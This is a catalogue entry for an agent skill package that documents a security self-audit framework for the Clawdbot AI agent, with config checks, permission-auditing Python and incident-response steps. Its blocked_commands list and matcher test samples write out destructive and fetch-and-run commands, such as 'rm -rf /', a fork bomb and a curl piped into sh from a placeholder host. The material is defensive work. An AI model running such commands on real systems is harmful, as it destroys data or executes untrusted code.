{
  "schemaVersion": "1.0",
  "item": {
    "slug": "clawdbot-security-check",
    "name": "Clawdbot Security Check",
    "source": "tencent",
    "type": "skill",
    "category": "Security & Compliance",
    "sourceUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check",
    "canonicalUrl": "https://clawhub.ai/TheSethRose/clawdbot-security-check",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadMode": "redirect",
    "downloadUrl": "/downloads/clawdbot-security-check",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=clawdbot-security-check",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "installMethod": "Manual import",
    "extraction": "Extract archive",
    "prerequisites": [
      "OpenClaw"
    ],
    "packageFormat": "ZIP package",
    "includedAssets": [
      "README.md",
      "SKILL.md",
      "skill.json"
    ],
    "primaryDoc": "SKILL.md",
    "quickSetup": [
      "Download the package from Yavira.",
      "Extract the archive and review SKILL.md first.",
      "Import or place the package into your OpenClaw setup."
    ],
    "agentAssist": {
      "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
      "steps": [
        "Download the package from Yavira.",
        "Extract it into a folder your agent can access.",
        "Paste one of the prompts below and point your agent at the extracted folder."
      ],
      "prompts": [
        {
          "label": "New install",
          "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete."
        },
        {
          "label": "Upgrade existing",
          "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run."
        }
      ]
    },
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/clawdbot-security-check"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    },
    "downloadPageUrl": "https://openagent3.xyz/downloads/clawdbot-security-check",
    "agentPageUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent",
    "manifestUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/clawdbot-security-check/agent.md"
  },
  "agentAssist": {
    "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
    "steps": [
      "Download the package from Yavira.",
      "Extract it into a folder your agent can access.",
      "Paste one of the prompts below and point your agent at the extracted folder."
    ],
    "prompts": [
      {
        "label": "New install",
        "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete."
      },
      {
        "label": "Upgrade existing",
        "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run."
      }
    ]
  },
  "documentation": {
    "source": "clawhub",
    "primaryDoc": "SKILL.md",
    "sections": [
      {
        "title": "Clawdbot Self-Security Audit Framework",
        "body": "This skill empowers Clawdbot to audit its own security posture using first-principles reasoning. Rather than relying on a static script, Clawdbot learns the framework and applies it dynamically to detect vulnerabilities, understand their impact, and recommend specific remediations."
      },
      {
        "title": "Core Philosophy",
        "body": "\"Security through transparency and self-awareness.\" — Inspired by Daniel Miessler\n\nClawdbot should know its own attack surface. This skill embeds that knowledge directly."
      },
      {
        "title": "Security Principles",
        "body": "Running an AI agent with shell access requires caution. Focus on three areas:\n\nWho can talk to the bot — DM policies, group allowlists, channel restrictions\nWhere the bot is allowed to act — Network exposure, gateway binding, proxy configs\nWhat the bot can touch — Tool access, file permissions, credential storage\n\nStart with the smallest access possible and widen it as you gain confidence."
      },
      {
        "title": "Trust Hierarchy",
        "body": "Apply appropriate trust levels based on role:\n\nLevel\tEntity\tTrust Model\n1\tOwner\tFull trust — has all access\n2\tAI\tTrust but verify — sandboxed, logged\n3\tAllowlists\tLimited trust — only specified users\n4\tStrangers\tNo trust — blocked by default"
      },
      {
        "title": "Audit Commands",
        "body": "Use these commands to run security audits:\n\nclawdbot security audit — Standard audit of common issues\nclawdbot security audit --deep — Comprehensive audit with all checks\nclawdbot security audit --fix — Apply guardrail remediations"
      },
      {
        "title": "The 13 Security Domains",
        "body": "When auditing Clawdbot, systematically evaluate these domains:"
      },
      {
        "title": "1. Gateway Exposure 🔴 Critical",
        "body": "What to check:\n\nWhere is the gateway binding? (gateway.bind)\nIs authentication configured? (gateway.auth_token or CLAWDBOT_GATEWAY_TOKEN env var)\nWhat port is exposed? (default: 18789)\nIs WebSocket auth enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\nenv | grep CLAWDBOT_GATEWAY_TOKEN\n\nVulnerability: Binding to 0.0.0.0 or lan without auth lets anyone who can reach the port drive the gateway.\n\nRemediation:\n\n# Generate gateway token\nclawdbot doctor --generate-gateway-token\nexport CLAWDBOT_GATEWAY_TOKEN=\"$(openssl rand -hex 32)\"\n\nNote: an export only reaches processes started from that shell. Put the token in the environment the gateway daemon actually runs under (or in gateway.auth_token), restart the daemon, and re-run the env check from that context."
      },
      {
        "title": "2. DM Policy Configuration 🟠 High",
        "body": "What to check:\n\nWhat is dmPolicy set to?\nIf allowlist, who is explicitly allowed via allowFrom?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"dmPolicy\"|\"allowFrom\"'\n\nVulnerability: Setting it to open (or allow) means any user can DM Clawdbot; an asterisk in allowFrom has the same effect. The default, pairing, requires unknown senders to be approved by code first.\n\nRemediation:\n\n{\n  \"channels\": {\n    \"telegram\": {\n      \"dmPolicy\": \"allowlist\",\n      \"allowFrom\": [\"@trusteduser1\", \"@trusteduser2\"]\n    }\n  }\n}"
      },
      {
        "title": "3. Group Access Control 🟠 High",
        "body": "What to check:\n\nWhat is groupPolicy set to?\nAre groups explicitly allowlisted?\nAre mention gates configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -E '\"groupPolicy\"|\"groups\"' \ncat ~/.clawdbot/clawdbot.json | grep -i \"mention\"\n\nVulnerability: Open group policy allows anyone in the room to trigger commands.\n\nRemediation:\n\n{\n  \"channels\": {\n    \"telegram\": {\n      \"groupPolicy\": \"allowlist\",\n      \"groups\": {\n        \"-100123456789\": true\n      }\n    }\n  }\n}"
      },
      {
        "title": "4. Credentials Security 🔴 Critical",
        "body": "What to check:\n\nCredential file locations and permissions\nEnvironment variable usage\nAuth profile storage\n\nCredential Storage Map:\n\nPlatform\tPath\nWhatsApp\t~/.clawdbot/credentials/whatsapp/{accountId}/creds.json\nTelegram\t~/.clawdbot/clawdbot.json or env\nDiscord\t~/.clawdbot/clawdbot.json or env\nSlack\t~/.clawdbot/clawdbot.json or env\nPairing allowlists\t~/.clawdbot/credentials/channel-allowFrom.json\nAuth profiles\t~/.clawdbot/agents/{agentId}/auth-profiles.json\nLegacy OAuth\t~/.clawdbot/credentials/oauth.json\n\nHow to detect:\n\nls -la ~/.clawdbot/credentials/\nls -la ~/.clawdbot/agents/*/auth-profiles.json 2>/dev/null\nstat -c \"%a\" ~/.clawdbot/credentials/oauth.json 2>/dev/null\n\nVulnerability: Credentials are stored in plaintext, so loose permissions let any other local user (and anything running as one) read them. The remediation below shows the two most common files; every path in the map, including the WhatsApp creds.json and the per-agent auth-profiles.json, should be 600.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/credentials/oauth.json\nchmod 600 ~/.clawdbot/clawdbot.json"
      },
      {
        "title": "5. Browser Control Exposure 🟠 High",
        "body": "What to check:\n\nIs browser control enabled?\nAre authentication tokens set for remote control?\nIs HTTPS required for Control UI?\nIs a dedicated browser profile configured?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A5 '\"browser\"'\ncat ~/.clawdbot/clawdbot.json | grep -iE \"controlUi|insecureAuth\"\nls -la ~/.clawdbot/browser/\n\nVulnerability: Exposed browser control without auth allows remote UI takeover. Browser access allows the model to use logged-in sessions.\n\nRemediation:\n\n{\n  \"browser\": {\n    \"remoteControlUrl\": \"https://...\",\n    \"remoteControlToken\": \"...\",\n    \"dedicatedProfile\": true,\n    \"disableHostControl\": true\n  },\n  \"gateway\": {\n    \"controlUi\": {\n      \"allowInsecureAuth\": false\n    }\n  }\n}\n\nSecurity Note: Treat browser control URLs as admin APIs."
      },
      {
        "title": "6. Gateway Bind & Network Exposure 🟠 High",
        "body": "What to check:\n\nWhat is gateway.bind set to?\nAre trusted proxies configured?\nIs Tailscale enabled?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"gateway\"'\ncat ~/.clawdbot/clawdbot.json | grep '\"tailscale\"'\n\nVulnerability: A public bind without auth exposes the gateway to the whole network, and to the internet if the host is reachable from it.\n\nRemediation:\n\n{\n  \"gateway\": {\n    \"bind\": \"127.0.0.1\",\n    \"mode\": \"local\",\n    \"trustedProxies\": [\"127.0.0.1\", \"10.0.0.0/8\"],\n    \"tailscale\": {\n      \"mode\": \"off\"\n    }\n  }\n}\n\nKeep trustedProxies to the addresses of the reverse proxies that actually front the gateway. A whole range such as the 10.0.0.0/8 in the example makes every host in it a trusted proxy whose forwarded-client headers are believed; narrow it to the real proxy IPs."
      },
      {
        "title": "7. Tool Access & Sandboxing 🟡 Medium",
        "body": "What to check:\n\nAre elevated tools allowlisted?\nIs restrict_tools or mcp_tools configured?\nWhat is workspaceAccess set to?\nAre sensitive tools running in sandbox?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -iE \"restrict|mcp|elevated\"\ncat ~/.clawdbot/clawdbot.json | grep -iE \"workspaceAccess|sandbox\"\ncat ~/.clawdbot/clawdbot.json | grep -i \"openRoom\"\n\nWorkspace Access Levels:\n\nMode\tDescription\nnone\tWorkspace is off limits\nro\tWorkspace mounted read-only\nrw\tWorkspace mounted read-write\n\nVulnerability: Broad tool access means more blast radius if compromised. Smaller models are more susceptible to tool misuse.\n\nRemediation:\n\n{\n  \"restrict_tools\": true,\n  \"mcp_tools\": {\n    \"allowed\": [\"read\", \"write\", \"bash\"],\n    \"blocked\": [\"exec\", \"gateway\"]\n  },\n  \"workspaceAccess\": \"ro\",\n  \"sandbox\": \"all\"\n}\n\nCaveat: allowing bash hands the model a full shell, so blocking exec on the same list buys little on its own; sandbox and workspaceAccess are what bound what that shell can reach, which is why the example sets both.\n\nModel Guidance: Use latest generation models for agents with filesystem or network access. If using small models, disable web search and browser tools."
      },
      {
        "title": "8. File Permissions & Local Disk Hygiene 🟡 Medium",
        "body": "What to check:\n\nDirectory permissions (should be 700)\nConfig file permissions (should be 600)\nSymlink safety\n\nHow to detect:\n\nstat -c \"%a\" ~/.clawdbot\nls -la ~/.clawdbot/*.json\n\nVulnerability: Loose permissions allow other users to read sensitive configs.\n\nRemediation:\n\nchmod 700 ~/.clawdbot\nchmod 600 ~/.clawdbot/clawdbot.json\nchmod 600 ~/.clawdbot/credentials/*"
      },
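      {
        "title": "Added example: auditing state-directory permissions and symlinks",
        "body": "Domains 4 and 8 above check modes with stat and ls, list symlink safety as a check without giving one, and describe the --fix permission tightening only in prose. The Python below is an added example written for this page, not code shipped with the skill: it builds a constructed stand-in for ~/.clawdbot in a temp directory, walks it with lstat so symlinks are reported instead of followed, rates a loose mode under credentials/ as CRITICAL and elsewhere as MEDIUM (the severities domains 4 and 8 assign), and applies only the chmod changes the page describes. The tree layout, file names and the HIGH severity for symlinks are assumptions made for the demo.

```python
import os
import stat
import tempfile

# Expected modes from this page: directories 700, config and credential files 600.
DIR_MODE = 0o700
FILE_MODE = 0o600


def _write(path, mode):
    # Helper for the constructed sample tree: create a small file with a given mode.
    with open(path, 'w', encoding='utf-8') as fh:
        fh.write('{}')
    os.chmod(path, mode)
    return path


def build_sample_tree():
    # Constructed stand-in for ~/.clawdbot (example data, not a real install).
    base = tempfile.mkdtemp()
    root = os.path.join(base, '.clawdbot')
    creds = os.path.join(root, 'credentials')
    os.makedirs(creds)
    os.chmod(root, 0o755)                                      # loose: should be 700
    os.chmod(creds, 0o700)                                     # correct
    _write(os.path.join(root, 'clawdbot.json'), 0o644)         # loose config file
    _write(os.path.join(creds, 'oauth.json'), 0o600)           # correct
    _write(os.path.join(creds, 'whatsapp-creds.json'), 0o640)  # group-readable credential
    outside = _write(os.path.join(base, 'leaked-allowlist.json'), 0o600)
    # A symlink inside credentials/ that points outside the state directory:
    # reads follow it silently and chmod on the link would change the target.
    os.symlink(outside, os.path.join(creds, 'channel-allowFrom.json'))
    return root


def audit_permissions(root):
    # Returns (severity, path, finding, fix) tuples; never modifies anything.
    root = os.path.realpath(root)
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = stat.S_IMODE(os.lstat(dirpath).st_mode)
        if mode & 0o077:
            findings.append(('MEDIUM', dirpath, f'directory mode {mode:03o}, expected 700',
                             f'chmod 700 {dirpath}'))
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: inspect the link itself, not its target
            if stat.S_ISLNK(st.st_mode):
                target = os.path.realpath(path)
                where = 'inside' if target.startswith(root + os.sep) else 'outside'
                findings.append(('HIGH', path, f'symlink to {target} ({where} the state directory)',
                                 f'replace the symlink {path} with a regular file'))
                continue
            in_creds = os.path.relpath(path, root).split(os.sep)[0] == 'credentials'
            severity = 'CRITICAL' if in_creds else 'MEDIUM'
            mode = stat.S_IMODE(st.st_mode)
            if mode & 0o077:
                findings.append((severity, path, f'file mode {mode:03o}, expected 600',
                                 f'chmod 600 {path}'))
    return findings


def fix_permissions(findings):
    # The chmod part of what the page says --fix does; symlinks are left for a human.
    fixed = 0
    for _severity, path, _finding, fix in findings:
        if fix.startswith('chmod 700 '):
            os.chmod(path, DIR_MODE)
            fixed += 1
        elif fix.startswith('chmod 600 '):
            os.chmod(path, FILE_MODE)
            fixed += 1
    return fixed


if __name__ == '__main__':
    sample = build_sample_tree()
    before = audit_permissions(sample)
    for finding in before:
        print(finding)
    print('fixed:', fix_permissions(before))
    print('remaining:', audit_permissions(sample))
```

Run it as a script to see the findings before and after fix_permissions. To audit a real install, pass os.path.expanduser('~/.clawdbot') to audit_permissions and read the findings before handing them to fix_permissions; symlink findings are deliberately not auto-fixed, because chmod on a link changes the file it points to."
      },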
      {
        "title": "9. Plugin Trust & Model Hygiene 🟡 Medium",
        "body": "What to check:\n\nAre plugins explicitly allowlisted?\nAre legacy models in use with tool access?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -iE \"plugin|allowlist\"\ncat ~/.clawdbot/clawdbot.json | grep -iE \"model|anthropic\"\n\nVulnerability: Untrusted plugins can execute code. Legacy models may lack modern safety.\n\nRemediation:\n\n{\n  \"plugins\": {\n    \"allowlist\": [\"trusted-plugin-1\", \"trusted-plugin-2\"]\n  },\n  \"agents\": {\n    \"defaults\": {\n      \"model\": {\n        \"primary\": \"minimax/MiniMax-M2.1\"\n      }\n    }\n  }\n}"
      },
      {
        "title": "10. Logging & Redaction 🟡 Medium",
        "body": "What to check:\n\nWhat is logging.redactSensitive set to?\n\nIt should be set to tools so that sensitive tool output is redacted\nIf it is off, credentials that pass through tool output can leak into the logs\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -iE \"logging|redact\"\nls -la ~/.clawdbot/logs/\n\nRemediation:\n\n{\n  \"logging\": {\n    \"redactSensitive\": \"tools\",\n    \"path\": \"~/.clawdbot/logs/\"\n  }\n}"
      },
      {
        "title": "11. Prompt Injection Protection 🟡 Medium",
        "body": "What to check:\n\nIs wrap_untrusted_content or untrusted_content_wrapper enabled?\nHow is external/web content handled?\nAre links and attachments treated as hostile?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -iE \"untrusted|wrap\"\n\nPrompt Injection Mitigation Strategies:\n\nKeep DMs locked to pairing or allowlists\nUse mention gating in groups\nTreat all links and attachments as hostile\nRun sensitive tools in a sandbox\nUse instruction-hardened models like Anthropic Opus 4.5\n\nVulnerability: Untrusted content (web fetches, sandbox output) can inject malicious prompts.\n\nRemediation:\n\n{\n  \"wrap_untrusted_content\": true,\n  \"untrusted_content_wrapper\": \"<untrusted>\",\n  \"treatLinksAsHostile\": true,\n  \"mentionGate\": true\n}"
      },
      {
        "title": "12. Dangerous Command Blocking 🟡 Medium",
        "body": "What to check:\n\nWhat commands are in blocked_commands?\nAre these patterns included: rm -rf, curl |, git push --force, mkfs, fork bombs?\n\nHow to detect:\n\ncat ~/.clawdbot/clawdbot.json | grep -A10 '\"blocked_commands\"'\n\nVulnerability: Without blocking, a malicious prompt could destroy data or exfiltrate credentials.\n\nRemediation:\n\n{\n  \"blocked_commands\": [\n    \"rm -rf\",\n    \"curl |\",\n    \"git push --force\",\n    \"mkfs\",\n    \":(){:|:&}\"\n  ]\n}\n\nCaveat: blocked_commands is a string-pattern list, so variants such as rm -fr, a path-qualified /bin/rm, or a command assembled from variables slip past it. Treat it as a speed bump, not a boundary; the sandbox and workspaceAccess settings in domain 7 are what limit the damage a command can do."
      },
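      {
        "title": "Added example: how much a blocked_commands list actually catches",
        "body": "Domain 12 above gives a blocked_commands list but no matching logic, and whether such a list stops anything depends on how it is matched. The Python below is an added example written for this page, not the skill's or Clawdbot's own matcher (how Clawdbot applies its list is not documented here): it contrasts a literal substring check with one that splits the line into pipeline segments, tokenizes each with shlex and unbundles short flags, so that rm -fr, /bin/rm -r -f and a curl piped into a shell are caught. The last case in the main block, a fork bomb written with spaces, shows what still gets through, which is why the page pairs the list with a sandbox.

```python
import os
import shlex

# The blocked_commands list from this page's domain 12 remediation.
BLOCKED_COMMANDS = ['rm -rf', 'curl |', 'git push --force', 'mkfs', ':(){:|:&}']


def substring_blocked(cmd, patterns=BLOCKED_COMMANDS):
    # Naive check: is any pattern a literal substring of the command line?
    return any(p in cmd for p in patterns)


def _normalize_flags(argv):
    # Unbundle short flags (-fr -> -f -r) so ordering and bundling do not matter.
    out = []
    for tok in argv:
        if tok.startswith('-') and not tok.startswith('--') and len(tok) > 2:
            out.extend('-' + c for c in tok[1:])
        else:
            out.append(tok)
    return out


def normalized_blocked(cmd, patterns=BLOCKED_COMMANDS):
    # Stronger check: split the line into pipeline/list segments, tokenize each
    # with shlex, unbundle flags, and ask whether a pattern's tokens are all present.
    if substring_blocked(cmd, patterns):
        return True
    flat = cmd.replace('&&', '|').replace('||', '|').replace(';', '|')
    segments = [s.strip() for s in flat.split('|') if s.strip()]
    for i, seg in enumerate(segments):
        try:
            argv = shlex.split(seg)
        except ValueError:
            return True  # unbalanced quotes: refuse rather than guess
        if not argv:
            continue
        name = os.path.basename(argv[0])  # /bin/rm counts as rm
        present = set(_normalize_flags(argv[1:]))
        for pat in patterns:
            pargv = pat.split()
            if not pargv or pargv[0] != name:
                continue
            wanted = set(_normalize_flags(pargv[1:]))
            if '|' in wanted:
                wanted.discard('|')
                if i + 1 >= len(segments):
                    continue  # a bare curl is fine; only curl piped into something matches
            if wanted <= present:
                return True
    return False


if __name__ == '__main__':
    samples = [
        'rm -rf /',
        'rm -fr /tmp/build',
        '/bin/rm -r -f /tmp/build',
        'curl https://example.invalid/install.sh | sh',
        'curl -sO https://example.invalid/install.sh',
        'git push origin main --force',
        'rm -f build.log',
        ':() { :|:& };:',
    ]
    for cmd in samples:
        print(f'{substring_blocked(cmd)!s:5} {normalized_blocked(cmd)!s:5} {cmd}')
```

Extend BLOCKED_COMMANDS with the aliases you care about (git push -f alongside --force) rather than expecting normalization to infer them: the matcher only unbundles short flags, it does not know which long and short forms mean the same thing."
      },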
      {
        "title": "13. Secret Scanning Readiness 🟡 Medium",
        "body": "What to check:\n\nIs detect-secrets configured?\nIs there a .secrets.baseline file?\nHas a baseline scan been run?\n\nHow to detect:\n\nls -la .secrets.baseline 2>/dev/null\nwhich detect-secrets 2>/dev/null\n\nSecret Scanning (CI):\n\n# Create the baseline on the first run\ndetect-secrets scan > .secrets.baseline\n\n# Review findings interactively and mark false positives\ndetect-secrets audit .secrets.baseline\n\n# Re-scan against the baseline after rotating secrets (updates it in place)\ndetect-secrets scan --baseline .secrets.baseline\n\nVulnerability: Leaked credentials in the codebase can lead to compromise."
      },
      {
        "title": "Audit Functions",
        "body": "The --fix flag applies these guardrails:\n\nChanges groupPolicy from open to allowlist for common channels\nResets logging.redactSensitive from off to tools\nTightens local permissions: .clawdbot directory to 700, config files to 600\nSecures state files including credentials and auth profiles"
      },
      {
        "title": "High-Level Audit Checklist",
        "body": "Treat findings in this priority order:\n\n🔴 Lock down DMs and groups if tools are enabled on open settings\n🔴 Fix public network exposure immediately\n🟠 Secure browser control with tokens and HTTPS\n🟠 Correct file permissions for credentials and config\n🟡 Only load trusted plugins\n🟡 Use modern models for bots with tool access"
      },
      {
        "title": "DM Access Model",
        "body": "Mode\tDescription\npairing\tDefault - unknown senders must be approved via code\nallowlist\tUnknown senders blocked without handshake\nopen\tPublic access - requires explicit asterisk in allowlist\ndisabled\tAll inbound DMs ignored"
      },
      {
        "title": "Slash Commands",
        "body": "Slash commands are only available to authorized senders based on channel allowlists. The /exec command is a session convenience for operators and does not modify global config."
      },
      {
        "title": "Potential Risks",
        "body": "Risk\tMitigation\nExecution of shell commands\tblocked_commands, restrict_tools\nFile and network access\tsandbox, workspaceAccess: none/ro\nSocial engineering and prompt injection\twrap_untrusted_content, mentionGate\nBrowser session hijacking\tDedicated profile, token auth, HTTPS\nCredential leakage\tlogging.redactSensitive: tools, env vars"
      },
      {
        "title": "Incident Response",
        "body": "If a compromise is suspected, follow these steps:"
      },
      {
        "title": "Containment",
        "body": "Stop the gateway process — clawdbot daemon stop\nSet gateway.bind to loopback — \"bind\": \"127.0.0.1\"\nDisable risky DMs and groups — Set to disabled"
      },
      {
        "title": "Rotation",
        "body": "Change the gateway auth token — clawdbot doctor --generate-gateway-token\nRotate browser control and hook tokens\nRevoke and rotate API keys for model providers"
      },
      {
        "title": "Review",
        "body": "Check gateway logs and session transcripts — ~/.clawdbot/logs/\nReview recent config changes — Git history or backups\nRe-run the security audit with the deep flag — clawdbot security audit --deep"
      },
      {
        "title": "Reporting Vulnerabilities",
        "body": "Report security issues to: security@clawd.bot\n\nDo not post vulnerabilities publicly until they have been fixed."
      },
      {
        "title": "Audit Execution Steps",
        "body": "When running a security audit, follow this sequence:"
      },
      {
        "title": "Step 1: Locate Configuration",
        "body": "# The config can hold tokens, and anything printed here lands in the session\n# transcript, so keep logging.redactSensitive set to tools (domain 10) before running this.\nCONFIG_PATHS=(\n  \"$HOME/.clawdbot/clawdbot.json\"\n  \"$HOME/.clawdbot/config.yaml\"\n  \"$HOME/.clawdbot/.clawdbotrc\"\n  \".clawdbotrc\"\n)\nfor path in \"${CONFIG_PATHS[@]}\"; do\n  if [ -f \"$path\" ]; then\n    echo \"Found config: $path\"\n    cat \"$path\"\n    break\n  fi\ndone"
      },
      {
        "title": "Step 2: Run Domain Checks",
        "body": "For each of the 13 domains above:\n\nParse relevant config keys\nCompare against secure baseline\nFlag deviations with severity"
      },
      {
        "title": "Step 3: Generate Report",
        "body": "Format findings by severity:\n\n🔴 CRITICAL: [vulnerability] - [impact]\n🟠 HIGH: [vulnerability] - [impact]\n🟡 MEDIUM: [vulnerability] - [impact]\n✅ PASSED: [check name]"
      },
      {
        "title": "Step 4: Provide Remediation",
        "body": "For each finding, output:\n\nSpecific config change needed\nExample configuration\nCommand to apply (if safe)"
      },
      {
        "title": "Report Template",
        "body": "═══════════════════════════════════════════════════════════════\n🔒 CLAWDBOT SECURITY AUDIT\n═══════════════════════════════════════════════════════════════\nTimestamp: $(date -Iseconds)\n\n┌─ SUMMARY ───────────────────────────────────────────────\n│ 🔴 Critical:  $CRITICAL_COUNT\n│ 🟠 High:      $HIGH_COUNT\n│ 🟡 Medium:    $MEDIUM_COUNT\n│ ✅ Passed:    $PASSED_COUNT\n└────────────────────────────────────────────────────────\n\n┌─ FINDINGS ──────────────────────────────────────────────\n│ 🔴 [CRITICAL] $VULN_NAME\n│    Finding: $DESCRIPTION\n│    → Fix: $REMEDIATION\n│\n│ 🟠 [HIGH] $VULN_NAME\n│    ...\n└────────────────────────────────────────────────────────\n\nThis audit was performed by Clawdbot's self-security framework.\nNo changes were made to your configuration."
      },
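      {
        "title": "Added example: a config-key audit that produces the report",
        "body": "Steps 1 to 4 and the Report Template describe the audit as parse, compare, flag, report, and domains 1, 2, 3, 6 and 10 are the checks that can be decided from config keys alone. The Python below is an added example written for this page, not the skill's own implementation (the skill is applied by the agent, not by a script): it loads the JSON config, evaluates those five domains against the baseline the page states, sorts findings by severity and produces the summary and findings lines of the template. Key names (gateway.bind, gateway.auth_token, CLAWDBOT_GATEWAY_TOKEN, dmPolicy, allowFrom, groupPolicy, logging.redactSensitive) are taken from the page; the sample config is constructed for the demo, and treating ::1 and localhost as loopback and an asterisk in allowFrom as public are assumptions drawn from the DM Access Model table and common practice.

```python
import json
import os

# Constructed sample config (example data, not a real deployment). Key names
# follow this page's remediation snippets and check descriptions.
SAMPLE_CONFIG = {
    'gateway': {'bind': '0.0.0.0', 'port': 18789},
    'channels': {
        'telegram': {'dmPolicy': 'open', 'groupPolicy': 'open'},
        'discord': {'dmPolicy': 'allowlist', 'allowFrom': ['@owner', '*'], 'groupPolicy': 'allowlist'},
    },
    'logging': {'redactSensitive': 'off'},
}

# Binds treated as loopback-only (assumption: the page itself only names 127.0.0.1).
LOOPBACK_BINDS = {'127.0.0.1', '::1', 'localhost'}
SEVERITY_ORDER = {'CRITICAL': 0, 'HIGH': 1, 'MEDIUM': 2}


def load_config(path='~/.clawdbot/clawdbot.json'):
    # Step 1: read the config. The audit only reads; it never writes.
    with open(os.path.expanduser(path), encoding='utf-8') as fh:
        return json.load(fh)


def audit_config(cfg, env=None):
    # Step 2: compare config keys against the baseline and flag deviations.
    # Returns (severity, domain, finding, fix) tuples sorted by severity.
    env = os.environ if env is None else env
    findings = []
    gw = cfg.get('gateway', {})
    bind = str(gw.get('bind', '127.0.0.1'))
    has_token = bool(gw.get('auth_token') or env.get('CLAWDBOT_GATEWAY_TOKEN'))
    if bind not in LOOPBACK_BINDS and not has_token:
        findings.append(('CRITICAL', 'Gateway Exposure', f'gateway.bind={bind} with no auth token',
                         'bind to 127.0.0.1 or set CLAWDBOT_GATEWAY_TOKEN'))
    elif bind not in LOOPBACK_BINDS:
        findings.append(('HIGH', 'Gateway Bind & Network Exposure', f'gateway.bind={bind} is reachable off-host',
                         'bind to 127.0.0.1 and reach it through a trusted proxy or Tailscale'))
    for name, ch in cfg.get('channels', {}).items():
        dm = ch.get('dmPolicy', 'pairing')  # pairing is the default per the DM Access Model
        allow = ch.get('allowFrom', [])
        if dm in ('open', 'allow') or '*' in allow:
            findings.append(('HIGH', 'DM Policy Configuration',
                             f'channels.{name}: dmPolicy={dm}, allowFrom={allow}',
                             'set dmPolicy to pairing or allowlist and list only trusted senders'))
        if ch.get('groupPolicy') == 'open':
            findings.append(('HIGH', 'Group Access Control', f'channels.{name}.groupPolicy=open',
                             'set groupPolicy to allowlist and enumerate the allowed groups'))
    if cfg.get('logging', {}).get('redactSensitive') == 'off':
        findings.append(('MEDIUM', 'Logging & Redaction', 'logging.redactSensitive=off',
                         'set logging.redactSensitive to tools'))
    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])
    return findings


def format_report(findings):
    # Steps 3 and 4: the summary and findings blocks of the Report Template, as lines.
    counts = {sev: sum(1 for f in findings if f[0] == sev) for sev in SEVERITY_ORDER}
    c, h, m = counts['CRITICAL'], counts['HIGH'], counts['MEDIUM']
    lines = ['CLAWDBOT SECURITY AUDIT', f'Critical: {c}  High: {h}  Medium: {m}', '']
    for sev, domain, finding, fix in findings:
        lines.append(f'[{sev}] {domain}: {finding}')
        lines.append(f'    -> Fix: {fix}')
    lines.append('No changes were made to your configuration.')
    return lines


if __name__ == '__main__':
    for line in format_report(audit_config(SAMPLE_CONFIG, env={})):
        print(line)
```

Replace SAMPLE_CONFIG with load_config() to audit a real install; the function only reads, which keeps the template's closing line true."
      },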
      {
        "title": "Extending the Skill",
        "body": "To add new security checks:\n\nIdentify the vulnerability - What misconfiguration creates risk?\nDetermine detection method - What config key or system state reveals it?\nDefine the baseline - What is the secure configuration?\nWrite detection logic - Shell commands or file parsing\nDocument remediation - Specific steps to fix\nAssign severity - Critical, High, Medium, Low"
      },
      {
        "title": "Example: Adding SSH Hardening Check",
